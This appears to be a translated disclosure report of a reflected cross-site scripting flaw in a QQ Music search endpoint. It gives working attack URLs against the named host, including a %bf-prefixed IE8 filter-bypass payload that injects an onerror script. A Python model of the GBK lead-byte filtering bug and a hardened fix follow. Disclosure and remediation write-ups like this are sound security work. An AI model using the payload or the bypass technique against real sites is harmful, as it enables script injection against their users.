This was originally not an XSS point, but it could be bypassed in an unusual way.

1. First, the normal case:
   http://soso.music.qq.com/fcgi-bin/cgiSearchKeyWord?w=aaa<script>
   Both < and > are clearly filtered into &lt; and &gt;.

2. So it does not look like an XSS point, but it can be bypassed in the following surprising way:
   http://soso.music.qq.com/fcgi-bin/cgiSearchKeyWord?w=aaa%bf
   That is, a character prefixed with %bf is not filtered, and the %bf itself is dropped on output.

3. Going further, to bypass the IE8 XSS filter, this is combined with WooYun: IE8 xss filter bypass (xss filter bypass):
http://soso.music.qq.com/fcgi-bin/cgiSearchKeyWord?w=%bf<div/id%bf%3dx%bf>x%bf</div%bf>%bf<xml:namespace prefix%bf%3dt%bf>%bf<import namespace%bf%3dt implementation%bf%3d%23default%23time2%bf>%bf<t:set/attributename%bf%3dinnerHTML targetElement%bf%3dx to%bf%3d%26lt;img%26%2311;src%bf%3dx:x%26%2311;onerror%26%2311;%bf%3dalert%26%23x28;1%26%23x29;%26gt;%bf>
Tested on: Windows XP + IE8
Solution:
I do not know the server-side filtering logic.
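Since the real server-side logic is not known, the following is an added model (not QQ Music's code, written for this page) of the failure mode described in step 2: a byte-level filter that treats any byte above 0x80 as the lead byte of a two-byte GBK character, run before the output stage decodes and silently drops the invalid lone 0xbf. The hardened form beside it decodes once, strictly, and escapes the resulting text. The filter logic and the sample queries are assumptions, not the site's actual code.

```python
import html
from urllib.parse import unquote_to_bytes

# Constructed inputs modelling the report: the plain query from step 1 and the
# %bf-prefixed form from step 2 (%bf placed only before '<' and '>').
PLAIN_QUERY = "aaa%3Cscript%3E"
PREFIXED_QUERY = "aaa%bf%3Cscript%bf%3E"

def naive_filter(raw: bytes) -> bytes:
    """Hypothetical byte-level filter reproducing the reported behaviour.

    It is 'double-byte aware' in the common hand-rolled way: any byte >= 0x81
    is taken as the lead byte of a two-byte GBK character and the next byte is
    copied through unchecked.  Only bare '<' and '>' are escaped.
    """
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b >= 0x81 and i + 1 < len(raw):
            out += raw[i:i + 2]   # 0xbf '<' passes through as one "character"
            i += 2
        elif b == 0x3C:
            out += b"&lt;"
            i += 1
        elif b == 0x3E:
            out += b"&gt;"
            i += 1
        else:
            out.append(b)
            i += 1
    return bytes(out)

def render_vulnerable(query: str) -> str:
    """Filter the raw bytes, then decode for output.

    '<' (0x3C) is below 0x40 and so can never be a valid GBK trail byte; the
    decoder drops the lone 0xbf and the '<' survives unescaped.
    """
    raw = unquote_to_bytes(query)
    return naive_filter(raw).decode("gbk", errors="ignore")

def render_hardened(query: str) -> str:
    """Decode once, strictly, then escape the resulting text.

    Invalid sequences become U+FFFD instead of being silently dropped, and the
    escaper works on characters, so a stray lead byte cannot hide a '<'.
    """
    text = unquote_to_bytes(query).decode("gbk", errors="replace")
    return html.escape(text, quote=True)
```

The general rule this illustrates: never filter or escape in one encoding interpretation and emit in another; normalise to text first, with invalid input rejected or replaced, then escape for the output context.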